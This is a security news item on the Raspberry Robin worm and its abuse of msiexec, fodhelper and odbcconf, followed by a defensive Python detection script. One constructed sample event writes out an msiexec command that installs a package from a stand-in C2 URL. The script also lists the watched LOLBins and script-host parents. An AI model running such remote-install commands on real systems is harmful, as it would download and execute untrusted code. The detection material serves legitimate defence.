Hundreds of organizations across different industries were identified by Microsoft to have their Windows networks infected with the Raspberry Robin malware, which was discovered to proliferate through infected USB devices by Red Canary researchers, according to BleepingComputer.
Malicious actors have yet to exploit network access provided by the Raspberry Robin malware even though the worm had been observed linking to Tor network addresses, said Microsoft in a private threat intelligence advisory given to Microsoft Defender for Endpoint subscribers.
The findings follow Red Canary's detection of Raspberry Robin on its customers' networks in September, after Sekoia found that the malware had leveraged QNAP network-attached storage devices as command-and-control servers. Red Canary then reported that legitimate Windows utilities including msiexec, fodhelper, and odbcconf have been used for payload execution.
"While msiexec.exe downloads and executes legitimate installer packages, adversaries also leverage it to deliver malware. Raspberry Robin uses msiexec.exe to attempt external network communication to a malicious domain for C2 purposes," said Red Canary.
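As an added example that is not from Microsoft, Red Canary or Sekoia, the following script turns the two behaviours described above (msiexec.exe pulling a package from a remote URL, and fodhelper/odbcconf being launched from a scripting host) into simple detection logic run over constructed process-creation events; the field names `image`, `parent` and `cmdline` are assumed and should be mapped from your own Sysmon or EDR export.

```python
"""Flag process-creation events matching the Raspberry Robin LOLBin usage described above."""
import re
from typing import Dict, List, Optional

# msiexec normally installs local .msi files; a URL in its command line means it is
# fetching the package from the network, which matches the C2 behaviour Red Canary described.
REMOTE_PKG = re.compile(r"https?://", re.IGNORECASE)
# Parents from which fodhelper.exe / odbcconf.exe are rarely started during legitimate use.
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "rundll32.exe"}
WATCHED_LOLBINS = {"fodhelper.exe", "odbcconf.exe"}

# Constructed sample events (not real telemetry); field names are an assumption.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"pid": "1001", "image": r"C:\Windows\System32\msiexec.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"msiexec.exe /i C:\Users\alice\Downloads\vendor-setup.msi /qn"},   # benign local install
    {"pid": "1002", "image": r"C:\Windows\System32\msiexec.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"msiexec /q /i http://c2.example.invalid:8080/pkg"},                # remote package fetch
    {"pid": "1003", "image": r"C:\Windows\System32\fodhelper.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "fodhelper.exe"},
    {"pid": "1004", "image": r"C:\Windows\System32\odbcconf.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "odbcconf.exe"},
]


def basename(path: str) -> str:
    """Return the lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: Dict[str, str]) -> Optional[str]:
    """Return a reason string if the event matches a watched behaviour, else None."""
    image = basename(event.get("image", ""))
    parent = basename(event.get("parent", ""))
    cmdline = event.get("cmdline", "")
    if image == "msiexec.exe" and REMOTE_PKG.search(cmdline):
        return "msiexec.exe fetching a package from a remote URL"
    if image in WATCHED_LOLBINS and parent in SCRIPT_HOSTS:
        return f"{image} launched from {parent}"
    return None


def scan(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Run classify() over all events and collect the flagged ones with their reason."""
    return [{"pid": ev.get("pid", "?"), "reason": reason}
            for ev in events if (reason := classify(ev))]


if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(f"pid {hit['pid']}: {hit['reason']}")
```

Tune SCRIPT_HOSTS and the URL pattern to your environment before deploying, since some software deployment tools legitimately pass URLs to msiexec.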